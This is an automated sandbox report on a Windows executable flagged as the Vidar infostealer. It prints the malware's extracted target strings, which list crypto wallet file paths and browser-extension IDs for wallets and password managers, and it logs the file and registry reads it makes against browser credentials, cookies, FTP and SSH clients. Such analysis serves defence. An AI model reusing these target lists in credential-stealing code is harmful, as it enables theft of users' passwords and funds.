Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.000000000254F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MetaMask\|1\|nkbihfbeogaeaoehlefnkodbefgpgknn\|1\|0\|0\|MetaMask\|1\|djclckkglechooblngghdinmeemkbgci\|1\|0\|0\|MetaMask\|1\|ejbalbakoplchlghecdalmeeeajnimhm\|1\|0\|0\|TronLink\|1\|ibnejdfjmmkpcnlpebklmnkoeoihofec\|1\|0\|0\|BinanceChainWallet\|1\|fhbohimaelbohpjbbldcngcnapndodjp\|1\|1\|0\|Yoroi\|1\|ffnbelfdoeiohenkjibnmadjiehjhajb\|1\|0\|0\|Coinbase\|1\|hnfanknocfeofbddgcijnmhnfnkdnaad\|1\|0\|1\|Guarda\|1\|hpglfhgfnhbgpjdenjgmdgoeiappafln\|1\|0\|1\|iWallet\|1\|kncchdigobghenbbaddojjnnaogfppfj\|1\|0\|0\|RoninWallet\|1\|fnjhmkhhmkbjkkabndcnnogagogbneec\|1\|0\|0\|NeoLine\|1\|cphhlgmgameodnhkjdmkpanlelnlohao\|1\|0\|0\|CloverWallet\|1\|nhnkbkgjikgcigadomkphalanndcapjk\|1\|0\|0\|LiqualityWallet\|1\|kpfopkelmapcoipemfendmdcghnegimn\|1\|0\|0\|Terra_Station\|1\|aiifbnbfobpmeekipheeijimdpnlpgpp\|1\|0\|0\|Keplr\|1\|dmkamcknogkgcdfhhbddcghachkejeap\|1\|0\|0\|AuroWallet\|1\|cnmamaachppnkjgnildpdmkaakejnhae\|1\|0\|0\|PolymeshWallet\|1\|jojhfeoedkpkglbfimdfabpdfjaoolaf\|1\|0\|0\|ICONex\|1\|flpiciilemghbmfalicajoolhkkenfel\|1\|0\|0\|Coin98\|1\|aeachknmefphepccionboohckonoeemg\|1\|0\|0\|EVER Wallet\|1\|cgeeodpfagjceefieflmdfphplkenlfk\|1\|0\|0\|KardiaChain\|1\|pdadjkfkgcafgbceimcpbkalnfnepbnk\|1\|0\|0\|Rabby\|1\|acmacodkjbdgmoleebolmdjonilkdbch\|1\|0\|0\|Phantom\|1\|bfnaelmomeimhlpmgjnjophhpkkoljpa\|1\|0\|0\|Oxygen (Atomic)\|1\|fhilaheimglignddkjgofkcbgekhenbh\|1\|0\|0\|PaliWallet\|1\|mgffkfbidihjpoaomajlbgchddlicgpn\|1\|0\|0\|NamiWallet\|1\|lpfcbjknijpeeillifnkikgncikgfhdo\|1\|0\|0\|Solflare\|1\|bhhhlbepdkbapadjdnnojkbgioiodbic\|1\|0\|0\|CyanoWallet\|1\|dkdedlpgdmmkkfjabffeganieamfklkm\|1\|0\|0\|KHC\|1\|hcflpincpppdclinealmandijcmnkbgn\|1\|0\|0\|TezBox\|1\|mnfifefkajgofkcjkemidiaecocnkjeh\|1\|0\|0\|Goby\|1\|jnkelfanjkeadonecabehalmbgpfodjm\|1\|0\|0\|RoninWalletEdge\|1\|kjmoohlgokccodicjjfebfomlbljgfhk\|1\|0\|0\|UniSat Wallet\|1\|ppbibelpcjmhbdihakflkdcoccbgbkpo\|1\|0\|0\|Authenticator\|0\|bhghoamapcdpbohphigoooaddinpkbai\|1\|1\|0\|GAuth Authenticator\|0\|ilgcnhelpchnceeipipijaljkblbcobl\|1\|1\|1\|Tronium\|1\|pnndplcbkakcplkjnolgbkdgjikjednm\|1\|0\|0\|Trust Wallet\|1\|egjidjbpglichdcondbcbdnbeeppgdph\|1\|0\|0\|Exodus Web3 Wallet\|1\|aholpfdialjgjfhomihkjbmgjidlcdno\|1\|0\|0\|Braavos\|1\|jnlgamecbpmbajjfhmmmlhejkemejdma\|1\|0\|0\|Enkrypt\|1\|kkpllkodjeloidieedojogacfhpaihoh\|1\|0\|0\|OKX Web3 Wallet\|1\|mcohilncbfahbmgdjkbpemcciiolgcge\|1\|0\|0\|Sender\|1\|epapihdplajcdnnkdeiahlgigofloibg\|1\|0\|0\|Hashpack\|1\|gjagmgiddbbciopjhllkdnddhcglnemk\|1\|0\|0\|GeroWallet\|1\|bgpipimickeadkjlklgciifhnalhdjhe\|1\|0\|0\|Pontem Wallet\|1\|phkbamefinggmakgklpkljjmgibohnba\|1\|0\|0\|Finnie\|1\|cjmkndjhnagcfbpiemnkdpomccnjblmj\|1\|0\|0\|Leap Terra\|1\|aijcbedoijmgnlmjeegjaglmepbmpkpi\|1\|0\|0\|Microsoft AutoFill\|0\|fiedbfgcleddlbcmgdigjgdfcggjcion\|1\|0\|0\|Bitwarden\|0\|nngceckbapebfimnlniiiahkandclblb\|1\|0\|0\|KeePass Tusk\|0\|fmhmiaejopepamlcjkncpgpdjichnecm\|1\|0\|0\|KeePassXC-Browser\|0\|oboonakemofpalcgghocfoadofidjkkk\|1\|0\|0\|Rise - Aptos Wallet\|1\|hbbgbephgojikajhfbomhlmmollphcad\|1\|0\|0\|Rainbow Wallet\|1\|opfgelmcmbiajamepnmloijbpoleiama\|1\|0\|0\|Nightly\|1\|fiikommddbeccaoicoejoniammnalkfa\|1\|0\|0\|Ecto Wallet\|1\|bgjogpoidejdemgoochpnkmdjpocgkha\|1\|0\|0\|Coinhub\|1\|jgaaimajipbpdogpdglhaphldakikgef\|1\|0\|0\|Leap Cosmos Wallet\|1\|fcfcfllfndlomdhbehjjcoimbgofdncg\|1\|0\|0\|MultiversX DeFi Wal
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3363786257.000000001902E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match

File source: Process Memory Space: build_2024-07-25_20-56.exe PID: 2260, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 10.2.build_2024-07-25_20-56.exe.3fa0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.build_2024-07-25_20-56.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.build_2024-07-25_20-56.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.build_2024-07-25_20-56.exe.3fa0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.build_2024-07-25_20-56.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3355872691.0000000003FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2796849673.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
